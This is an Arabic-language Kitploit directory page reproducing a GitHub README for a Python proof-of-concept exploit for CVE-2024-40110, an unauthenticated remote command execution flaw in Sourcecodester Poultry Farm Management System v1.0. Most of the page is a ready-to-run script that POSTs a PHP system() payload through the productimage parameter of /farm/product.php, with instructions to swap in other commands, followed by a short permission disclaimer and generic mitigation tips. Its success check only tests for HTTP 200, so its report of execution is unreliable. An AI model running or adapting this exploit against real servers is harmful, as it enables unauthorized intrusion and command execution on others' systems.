Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-40110 — إثبات المفهوم (PoC) سكربت يوضح تنفيذ الأوامر عن بُعد دون مصادقة في نظام إدارة مزرعة الدواجن Sourcecodester عبر المعامل الضعيف productimage. | Kitploit
أدوات/GitHubGitHub/abdurahmon3236/cve-2024-40110
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubabdurahmon3236/cve-2024-40110

CVE-2024-40110

إثبات المفهوم (PoC) سكربت يوضح تنفيذ الأوامر عن بُعد دون مصادقة في نظام إدارة مزرعة الدواجن Sourcecodester عبر المعامل الضعيف productimage.

عرض المستودع
2منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم (PoC) لتنفيذ أوامر عن بعد بدون مصادقة في Sourcecodester Poultry Farm Management System v1.0

يحتوي هذا المستودع على نص إثبات المفهوم (PoC) الذي يوضح ثغرة تنفيذ أوامر عن بعد بدون مصادقة (RCE) في Sourcecodester Poultry Farm Management System v1.0. توجد الثغرة في المعامل productimage في /farm/product.php، مما يسمح للمهاجم بتنفيذ أوامر عشوائية على الخادم.

جدول المحتويات

  • وصف الثغرة
  • الإعداد والاستخدام
    • نص إثبات المفهوم
  • اعتبارات هامة
  • التخفيف

وصف الثغرة

CVE-ID: (قيد الانتظار)

نظرة عامة: يحتوي Sourcecodester Poultry Farm Management System v1.0 على ثغرة تنفيذ أوامر عن بعد بدون مصادقة (RCE) عبر المعامل productimage في /farm/product.php. تسمح هذه الثغرة للمهاجم بتنفيذ أوامر عشوائية على الخادم بدون مصادقة.

الإصدار المتأثر:

  • Sourcecodester Poultry Farm Management System v1.0

الإعداد والاستخدام

المتطلبات الأساسية

  • Python 3.x
  • مكتبة requests (pip install requests)

نص إثبات المفهوم

يوضح هذا النص كيف يمكن للمهاجم استغلال ثغرة RCE عن طريق إرسال طلب خبيث إلى المعامل المُعرّض للثغرة.

احفظ النص التالي باسم rce_poc.py وقم بتشغيله.

root@kitploit:~
import requests

# Configuration
target_url = "http://target-url/farm/product.php"  # Change this to the target URL

# Malicious payload
# The payload should be a command that the server can execute, e.g., 'ls' to list directory contents
# Here, we are using a simple PHP payload to demonstrate the RCE
payload = "<?php system('ls'); ?>"

# Construct the malicious request
data = {
    'productimage': payload  # The vulnerable parameter
}

def exploit_rce(url, data):
    """
    Exploit the RCE vulnerability by sending a malicious request to the target URL.

    Args:
        url (str): The target URL.
        data (dict): The data to be sent in the POST request.
    """
    try:
        response = requests.post(url, data=data)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully executed the payload.")
        else:
            print("[-] Failed to execute the payload.")
    except requests.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    print(f"Sending malicious request to: {target_url}")
    exploit_rce(target_url, data)

الشرح

  1. الإعداد: قم بتعيين target_url إلى عنوان URL لنقطة النهاية /farm/product.php للخادم المُعرّض للثغرة.
  2. الحمولة: الحمولة هي حمولة بسيطة لتنفيذ أوامر PHP. يمكنك تعديل الحمولة لتنفيذ أوامر مختلفة حسب الحاجة.
  3. بناء الطلب: يقوم النص ببناء طلب POST مع الحمولة الخبيثة في المعامل productimage.
  4. دالة الاستغلال: ترسل الدالة exploit_rce() الطلب الخبيث إلى عنوان URL المستهدف وتطبع تفاصيل الاستجابة.
  5. تشغيل النص: عند التشغيل، سيحاول النص استغلال ثغرة RCE وطباعة النتائج.

اعتبارات هامة

  • الأذونات: تأكد من حصولك على إذن صريح لاختبار هذه الثغرة على النظام المستهدف. الاختبار غير المصرح به غير قانوني وغير أخلاقي.
  • بيئة الاختبار: قم بإجراء هذا الاختبار في بيئة محكومة لتجنب التأثير على أنظمة الإنتاج.
  • تخصيص الحمولة: قم بتخصيص الحمولة حسب الحاجة لتحقيق تنفيذ الأوامر المطلوب.

التخفيف

لتخفيف هذه الثغرة، اتبع الخطوات التالية:

  • التحقق من المدخلات: قم بتطبيق التحقق المناسب من المدخلات لتنظيف مدخلات المستخدم.
  • قيود رفع الملفات: قم بتقييد رفع الملفات للسماح فقط بأنواع ملفات محددة وفرض حدود للحجم.
  • تحديث البرامج: قم بتحديث برامجك بانتظام إلى أحدث إصدار لتطبيق التصحيحات والإصلاحات الأمنية.

باتباع خطوات التخفيف هذه وأفضل الممارسات الأمنية، يمكنك منع الثغرات مثل مشكلة RCE هذه في Sourcecodester Poultry Farm Management System v1.0.

تنزيل الأداة